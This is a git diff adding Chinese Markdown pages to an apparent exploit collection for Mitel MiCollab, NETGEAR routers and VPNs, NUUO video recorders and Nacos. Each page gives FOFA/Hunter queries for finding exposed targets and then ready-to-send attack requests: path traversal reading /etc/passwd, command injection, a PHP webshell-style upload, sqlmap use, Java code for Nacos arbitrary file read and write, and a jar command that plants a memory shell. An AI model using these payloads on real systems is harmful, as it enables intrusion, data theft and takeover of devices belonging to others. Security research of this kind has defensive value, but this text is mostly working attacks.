+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vmaf89lengzpaw3e>
\ No newline at end of file
diff --git a/Mitel企业协作平台任意文件读取漏洞.md b/Mitel企业协作平台任意文件读取漏洞.md
new file mode 100644
index 0000000..cd90be0
--- /dev/null
+++ b/Mitel企业协作平台任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# Mitel企业协作平台任意文件读取漏洞
+
+由于Mitel MiCollab软件的 NuPoint 统一消息 (NPM) 组件中存在身份验证绕过漏洞，并且输入验证不足，未经身份验证的远程攻击者可利用该漏洞执行路径遍历攻击，成功利用可能导致未授权访问、破坏或删除用户的数据和系统配置。
+
+## fofa
+
+```javascript
+body="MiCollab End User Portal"
+```
+
+## poc
+
+```javascript
+POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Content-Type: application/x-www-form-urlencoded
+
+_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=x
+```
+
+![image-20241211213252626](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112132699.png)
\ No newline at end of file
diff --git a/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md b/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md
new file mode 100644
index 0000000..b34745e
--- /dev/null
+++ b/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md
@@ -0,0 +1,28 @@
+# NETGEAR DGND3700v2 路由器 setup.cgi 接口身份认证绕过漏洞
+
+# 一、漏洞简介
+NETGEAR DGND3700v2 是一款高效的企业路由器，NETGEAR DGND3700v2 存在身份认证绕过漏洞，攻击者可利用漏洞读取用户账号密码，访问敏感信息页面。
+
+# 二、影响版本
++ NETGEAR DGND3700v2
+
+# 三、资产测绘
++ hunter`web.title="DGND3700v2"`
+
+# 四、漏洞复现
+```java
+/setup.cgi?next_file=passwordrecovered.htm&foo=currentsetting.htm
+```
+
+![1702017292533-6337aabc-a1b3-455f-acee-a10ad3c20dfc.png](./img/frUEBsj0hfsCuNcA/1702017292533-6337aabc-a1b3-455f-acee-a10ad3c20dfc-883162.png)
+
+通过上述密码登录系统
+
+`admin/password`
+
+![1702017321828-68b8d415-f1e3-459a-aec6-0ba1bbeedea3.png](./img/frUEBsj0hfsCuNcA/1702017321828-68b8d415-f1e3-459a-aec6-0ba1bbeedea3-446432.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nfl28ku7srgz3zrl>
\ No newline at end of file
diff --git a/NETGEARProSafeSSLVPNSQL注入（CNNVD-202205-3298）.md b/NETGEARProSafeSSLVPNSQL注入（CNNVD-202205-3298）.md
new file mode 100644
index 0000000..c6c548b
--- /dev/null
+++ b/NETGEARProSafeSSLVPNSQL注入（CNNVD-202205-3298）.md
@@ -0,0 +1,27 @@
+# NETGEAR ProSafe SSL VPN SQL注入（CNNVD-202205-3298）
+
+# 一、漏洞简介
+NETGEAR FVS336G是美国网件（NETGEAR）公司的一款VPN（虚拟私人网络）防火墙路由器。NETGEAR ProSafe SSL VPN firmware FVS336Gv2 和FVS336Gv3版本存在安全漏洞，该漏洞源于cgi-bin/platform.cgi中的USERDBDomains.Domainname参数缺少过滤转义。攻击者可利用该漏洞进行SQL注入攻击，进而控制系统。
+
+# 二、影响版本
++ NETGEAR ProSafe SSL VPN 
+
+# 三、资产测绘
++ hunter`app.name=="NETGEAR ProSAFE"`
++ 特征
+
+![1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce.png](./img/3-oAw2G2HWdioD_W/1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce-587289.png)
+
+# 四、漏洞复现
+**sqlmap **
+
+```plain
+sqlmap -u "https://xx.xx.xx.xx/scgi-bin/platform.cgi" --form  -p USERDBDomains.Domainname --batch
+```
+
+![1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee.png](./img/3-oAw2G2HWdioD_W/1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee-692978.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mvw70mskzp0yhtyf>
\ No newline at end of file
diff --git a/NETGEARProSafeSSLVPN任意文件读取漏洞.md b/NETGEARProSafeSSLVPN任意文件读取漏洞.md
new file mode 100644
index 0000000..192d212
Binary files /dev/null and b/NETGEARProSafeSSLVPN任意文件读取漏洞.md differ
diff --git a/NUUO摄像头存在远程命令执行漏洞.md b/NUUO摄像头存在远程命令执行漏洞.md
new file mode 100644
index 0000000..137c871
--- /dev/null
+++ b/NUUO摄像头存在远程命令执行漏洞.md
@@ -0,0 +1,29 @@
+# ​NUUO摄像头存在远程命令执行漏洞
+
+# 一、漏洞简介
+NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器，该设备存在远程命令执行漏洞，攻击者可利用该漏洞执行任意命令，进而获取服务器的权限。
+
+# 二、影响版本
++ NUUO摄像头
+
+# 三、资产测绘
++ hunter`web.title="Network Video Recorder Login"`
++ 特征
+
+![1699193264623-ebc62d58-8540-4b12-b89e-50db1a27bdcc.png](./img/9KTLqutzFOqS5Otb/1699193264623-ebc62d58-8540-4b12-b89e-50db1a27bdcc-947661.png)
+
+# 四、漏洞复现
+```plain
+GET /__debugging_center_utils___.php?log=;id HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
+
+![1699193298040-d4aa2125-175a-43e8-a65d-1c942d48ce5d.png](./img/9KTLqutzFOqS5Otb/1699193298040-d4aa2125-175a-43e8-a65d-1c942d48ce5d-663831.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qa3vprl34sg1ay3x>
\ No newline at end of file
diff --git a/NUUO摄像机debugging_center_utils远程代码执行漏洞.md b/NUUO摄像机debugging_center_utils远程代码执行漏洞.md
new file mode 100644
index 0000000..f4100d4
--- /dev/null
+++ b/NUUO摄像机debugging_center_utils远程代码执行漏洞.md
@@ -0,0 +1,24 @@
+# NUUO摄像机debugging_center_utils远程代码执行漏洞
+
+NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器，NUUO摄像头debugging_center_utils存在未授权命令执行漏洞，攻击者可以获取服务器权限
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+GET /__debugging_center_utils___.php?log=;id HTTP/1.1
+Host: 
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502201149700.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/uC-qg8DN8MxNGPKaV3Utgw
\ No newline at end of file
diff --git a/NUUO摄像机handle_config.php远程代码执行漏洞.md b/NUUO摄像机handle_config.php远程代码执行漏洞.md
new file mode 100644
index 0000000..063ed5e
--- /dev/null
+++ b/NUUO摄像机handle_config.php远程代码执行漏洞.md
@@ -0,0 +1,18 @@
+# NUUO摄像机handle_config.php远程代码执行漏洞
+
+NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器，NUUO摄像头handle_config.php存在未授权命令执行漏洞，攻击者可以获取服务器权限
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+GET /handle_config.php?log=;id; HTTP/1.1
+Host: 
+```
+
+![image-20250219141445999](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502191414249.png)
\ No newline at end of file
diff --git a/NUUO摄像机handle_site_config远程代码执行漏洞.md b/NUUO摄像机handle_site_config远程代码执行漏洞.md
new file mode 100644
index 0000000..e42670b
--- /dev/null
+++ b/NUUO摄像机handle_site_config远程代码执行漏洞.md
@@ -0,0 +1,20 @@
+# NUUO摄像机handle_site_config远程代码执行漏洞
+
+NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器，NUUO摄像头handle_site_config.php存在未授权命令执行漏洞，攻击者可以获取服务器权限
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+GET /handle_site_config.php?log=;id; HTTP/1.1
+Host: 
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
+```
+
+![image-20250219154105386](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502191541564.png)
\ No newline at end of file
diff --git a/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md b/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md
new file mode 100644
index 0000000..61b8f18
--- /dev/null
+++ b/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# NUUO网络视频录像机css_parser.php任意文件读取漏洞
+
+NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+GET /css_parser.php?css=css_parser.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20240911095835420](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409110958603.png)
\ No newline at end of file
diff --git a/NUUO网络视频录像机upload.php任意文件上传漏洞.md b/NUUO网络视频录像机upload.php任意文件上传漏洞.md
new file mode 100644
index 0000000..2178820
--- /dev/null
+++ b/NUUO网络视频录像机upload.php任意文件上传漏洞.md
@@ -0,0 +1,34 @@
+# NUUO网络视频录像机upload.php任意文件上传漏洞
+
+NUUO网络视频录像机upload.php任意文件上传漏洞，未经身份验证攻击者可通过该漏洞上传恶意文件，造成服务器沦陷。
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+POST /upload.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Accept-Language: zh-CN
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=--------ok4o88lom
+accept: */*
+Content-Length: 155
+
+----------ok4o88lom
+Content-Disposition: form-data; name="userfile"; filename="test.php"
+
+<?php phpinfo();@unlink(__FILE__);?>
+----------ok4o88lom--
+```
+
+![5c2e597f5b4233b5e694d71104f622e9](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251439472.jpg)
\ No newline at end of file
diff --git a/NacosDerby远程命令执行漏洞(QVD-2024-26473).md b/NacosDerby远程命令执行漏洞(QVD-2024-26473).md
new file mode 100644
index 0000000..8a20645
--- /dev/null
+++ b/NacosDerby远程命令执行漏洞(QVD-2024-26473).md
@@ -0,0 +1,50 @@
+# Nacos Derby 远程命令执行漏洞(QVD-2024-26473)
+
+# <font style="color:rgb(51, 51, 51);">一、漏洞简介</font>
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在远程命令执行漏洞</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos 2.3.2</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ fofa `icon_hash="13942501"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/4dqBYlUSthO-Pvor/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-111429.png)
+
+# 四、漏洞复现
+前置条件：
+
+```plain
+1、需要naocs没有做鉴权，或者能登录后台获取凭证
+2、需要使用的是derby数据库，如果是mysql就不行
+```
+
+准备3个文件
+
+[exploit.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1730102385434-bed3e0d1-f9aa-4fb0-97bf-58e02f1536a0.txt)[server.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1730102385723-5c0ce8e6-955e-45d3-8edd-930373ebf091.txt)[config.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1730102385874-06c45712-f176-431c-8a7e-aee74aa7a07e.txt)
+
+1、修改config.py内容，host为自己的ip地址，port为自己电脑没有被占用的端口
+
+```plain
+server_host = '192.168.40.110'
+server_port = 9999
+```
+
+2、然后直接运行命令python service.py 启动web服务，记住安装flask和requests的py模块
+
+![1729316386052-7a74660b-9c2d-4bf8-9bf4-18d530e6d432.png](./img/4dqBYlUSthO-Pvor/1729316386052-7a74660b-9c2d-4bf8-9bf4-18d530e6d432-314080.png)
+
+3、启动成功后，再运行python exploit.py，输入目标nacos地址即可执行命令
+
+![1729316438195-42be8be8-5687-4574-98c1-09281b2c1d62.png](./img/4dqBYlUSthO-Pvor/1729316438195-42be8be8-5687-4574-98c1-09281b2c1d62-442473.png)
+
+ping dnslog测试
+
+![1729316528783-0d8ad515-f41b-4b4c-828d-f10beeeae9ad.png](./img/4dqBYlUSthO-Pvor/1729316528783-0d8ad515-f41b-4b4c-828d-f10beeeae9ad-630788.png)
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dr4623v0c8wevsk2>
\ No newline at end of file
diff --git a/Nacos任意文件读写漏洞.md b/Nacos任意文件读写漏洞.md
new file mode 100644
index 0000000..5e395b6
--- /dev/null
+++ b/Nacos任意文件读写漏洞.md
@@ -0,0 +1,82 @@
+# Nacos任意文件读写漏洞
+
+在Nacos<=2.4.0.1版本中集群模式启动下存在名为naming_persistent_service的Group，该Group所使用的Processor为com.alibaba.nacos.naming.consistency.persistent.impl.PersistentServiceProcessor类型Processor，在进行处理过程中会触发其父类`onApply`或`onRequest`方法,这两个方法会分别造成任意文件写入删除和任意文件读取
+
+官方社区公告：https://nacos.io/blog/announcement-nacos-security-problem-file/
+
+漏洞出现在Jraft服务（默认值7848）
+
+## fofa
+
+```java
+title="Nacos"
+```
+
+## 任意文件写入
+
+```java
+public static void send(String addr, byte[] payload) throws Exception {  
+    Configuration conf = new Configuration();  
+    conf.parse(addr);  
+    RouteTable.getInstance().updateConfiguration("nacos", conf);  
+    CliClientServiceImpl cliClientService = new CliClientServiceImpl();  
+    cliClientService.init(new CliOptions());  
+    RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();  
+    PeerId leader = PeerId.parsePeer(addr);  
+    Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");  
+    parserClasses.setAccessible(true);  
+    ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());  
+    map.put("com.alibaba.nacos.consistency.entity.WriteRequest", WriteRequest.getDefaultInstance());  
+    MarshallerHelper.registerRespInstance(WriteRequest.class.getName(), WriteRequest.getDefaultInstance());  
+    final WriteRequest writeRequest = WriteRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).setOperation("Write").build();  
+    Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), writeRequest, 5000);  
+    System.out.println(o);  
+}  
+
+public static void main(String[] args) throws Exception {  
+        String address = "192.168.3.153:7848";  
+        BatchWriteRequest request = new BatchWriteRequest();  
+        request.append("1.txt".getBytes(), "aaaa\n".getBytes());//向/home/nacos/data/naming/data/1.txt写入aaaa  
+        JacksonSerializer serializer = new JacksonSerializer();  
+        send(address, serializer.serialize(request));   
+    }
+```
+
+## 任意文件读取
+
+```java
+public static void send2(String addr, byte[] payload) throws Exception {  
+    Configuration conf = new Configuration();  
+    conf.parse(addr);  
+    RouteTable.getInstance().updateConfiguration("nacos", conf);  
+    CliClientServiceImpl cliClientService = new CliClientServiceImpl();  
+    cliClientService.init(new CliOptions());  
+    RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();  
+    PeerId leader = PeerId.parsePeer(addr);  
+    Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");  
+    parserClasses.setAccessible(true);  
+    ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());  
+    map.put("com.alibaba.nacos.consistency.entity.ReadRequest", ReadRequest.getDefaultInstance());  
+    MarshallerHelper.registerRespInstance(ReadRequest.class.getName(), ReadRequest.getDefaultInstance());  
+    final ReadRequest readRequest = ReadRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).build();  
+    Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), readRequest, 5000);  
+    System.out.println(o);  
+}  
+public static void main(String[] args) throws Exception {  
+        bypass();  
+        String address = "192.168.3.153:7848";  
+
+        JacksonSerializer serializer = new JacksonSerializer();  
+        List byteArrayList = Arrays.asList("../../../../../../proc/self/environ".getBytes());  
+        send2(address, serializer.serialize(byteArrayList));  
+
+    }
+```
+
+![image-20240827224619150](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281104726.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/570
\ No newline at end of file
diff --git a/Nacos存在Hessian反序列化漏洞.md b/Nacos存在Hessian反序列化漏洞.md
new file mode 100644
index 0000000..9042e66
--- /dev/null
+++ b/Nacos存在Hessian反序列化漏洞.md
@@ -0,0 +1,38 @@
+# Nacos存在 Hessian反序列化漏洞
+
+# <font style="color:rgb(51, 51, 51);">一、漏洞简介</font>
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在 Hessian反序列化漏洞</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ fofa `icon_hash="13942501"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/978s9GPtdTqLqp3h/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-011081.png)
+
+# 四、漏洞复现
+[NacosRce_jar.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/29512878/1730102385394-3297bb1d-0432-46be-b3dd-d879623eb40a.zip)
+
+执行命令
+
+```plain
+java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 "whoami"
+```
+
+![1728962458168-988ba965-1598-420c-ba8b-0f2eae91f733.png](./img/978s9GPtdTqLqp3h/1728962458168-988ba965-1598-420c-ba8b-0f2eae91f733-214348.png)
+
+打入内存马
+
+```plain
+java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 memshell
+```
+
+
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ziymxgvn5011of96>
\ No newline at end of file
diff --git a/Nacos存在SQL注入漏洞.md b/Nacos存在SQL注入漏洞.md
new file mode 100644
index 0000000..c343a2f
--- /dev/null
+++ b/Nacos存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# Nacos存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在SQL注入漏洞。</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/IkkWO2cBOQAjPiXD/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-961719.png)
+
+# 四、漏洞复现
+```plain
+/nacos/v1/cs/ops/derby?&sql=SELECT%20*FROM%20users
+```
+
+![1712670022957-e404e760-d7d5-4be8-8e7d-f9838b3c4969.png](./img/IkkWO2cBOQAjPiXD/1712670022957-e404e760-d7d5-4be8-8e7d-f9838b3c4969-489647.png)
+
+
+
+> 更新: 2024-10-28 15:59:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/orgycyhocbkyn07u>
\ No newline at end of file
diff --git a/Nacos存在SpringbootActuator未授权漏洞.md b/Nacos存在SpringbootActuator未授权漏洞.md
new file mode 100644
index 0000000..3c95b65
--- /dev/null
+++ b/Nacos存在SpringbootActuator未授权漏洞.md
@@ -0,0 +1,35 @@
+# Nacos存在Spring boot Actuator未授权漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在Spring boot Actuator未授权漏洞</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/tCM8yy1R79KWVs-U/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-922909.png)
+
+# 四、漏洞复现
+```plain
+/nacos/actuator/
+```
+
+![1723181812776-57f9f2be-fd9e-4eac-9788-48ca8d2386d1.png](./img/tCM8yy1R79KWVs-U/1723181812776-57f9f2be-fd9e-4eac-9788-48ca8d2386d1-338408.png)
+
+```plain
+HEAD /nacos/actuator/heapdump HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+```
+
+![1729412390938-c97ffc26-4ec1-4ed4-b87c-0db483ad416f.png](./img/tCM8yy1R79KWVs-U/1729412390938-c97ffc26-4ec1-4ed4-b87c-0db483ad416f-308532.png)
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/utanzrai31cospcx>
\ No newline at end of file
diff --git a/Nacos存在serviceSync未授权访问漏洞.md b/Nacos存在serviceSync未授权访问漏洞.md
new file mode 100644
index 0000000..534807a
--- /dev/null
+++ b/Nacos存在serviceSync未授权访问漏洞.md
@@ -0,0 +1,32 @@
+# Nacos存在serviceSync未授权访问漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在serviceSync未授权访问漏洞</font>
+
+# <font style="color:rgb(63, 63, 63);">二、影响版本</font>
++ <font style="color:rgb(63, 63, 63);">Nacos</font>
+
+# <font style="color:rgb(63, 63, 63);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ fofa`app="NACOS"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/Mx_5qpYTCzuDrSL-/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-620456.png)
+
+# 四、漏洞复现
+```plain
+/nacos/#/serviceSync
+```
+
+![1729426330695-15a37858-adda-4ca8-adb3-e7c967152baa.png](./img/Mx_5qpYTCzuDrSL-/1729426330695-15a37858-adda-4ca8-adb3-e7c967152baa-997048.png)
+
+```plain
+/v1/task/list?pageSize=10&pageNum=1
+```
+
+![1729426719698-3d63c9aa-96bf-421f-a764-e9f7374575f3.png](./img/Mx_5qpYTCzuDrSL-/1729426719698-3d63c9aa-96bf-421f-a764-e9f7374575f3-797790.png)
+
+
+
+> 更新: 2024-10-28 15:59:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yx9zlsgguyq1p5v5>
\ No newline at end of file
diff --git a/Nacos存在未授权下载配置信息漏洞.md b/Nacos存在未授权下载配置信息漏洞.md
new file mode 100644
index 0000000..223ef5f
--- /dev/null
+++ b/Nacos存在未授权下载配置信息漏洞.md
@@ -0,0 +1,35 @@
+# Nacos存在未授权下载配置信息漏洞
+
+一、漏洞简介
+
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在未授权下载配置信息漏洞 </font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ fofa `icon_hash="13942501"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/RWufMeRanf6G5Rfy/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-533247.png)
+
+# 四、漏洞复现
+```plain
+GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
+Host: 
+If-Modified-Since: Wed, 03 Apr 2024 06:25:07 GMT
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+```
+
+![1727070243107-46f80892-97ca-4e7c-a545-a85b1ea42e60.png](./img/RWufMeRanf6G5Rfy/1727070243107-46f80892-97ca-4e7c-a545-a85b1ea42e60-575442.png)![1727070251522-dba0dbcc-9311-4c06-954c-8b1fff3951a7.png](./img/RWufMeRanf6G5Rfy/1727070251522-dba0dbcc-9311-4c06-954c-8b1fff3951a7-884665.png)
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ssg3fe6cnv42gbrw>
\ No newline at end of file
diff --git a/Nacos存在版本信息泄露.md b/Nacos存在版本信息泄露.md
new file mode 100644
index 0000000..1aa263b
--- /dev/null
+++ b/Nacos存在版本信息泄露.md
@@ -0,0 +1,26 @@
+# Nacos存在版本信息泄露
+
+# <font style="color:rgb(51, 51, 51);">一、漏洞简介</font>
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在版本信息泄露</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ fofa `icon_hash="13942501"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/6t6u-HEvLLK-dJHp/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-025218.png)
+
+# 四、漏洞复现
+```plain
+/nacos/v1/console/server/state
+```
+
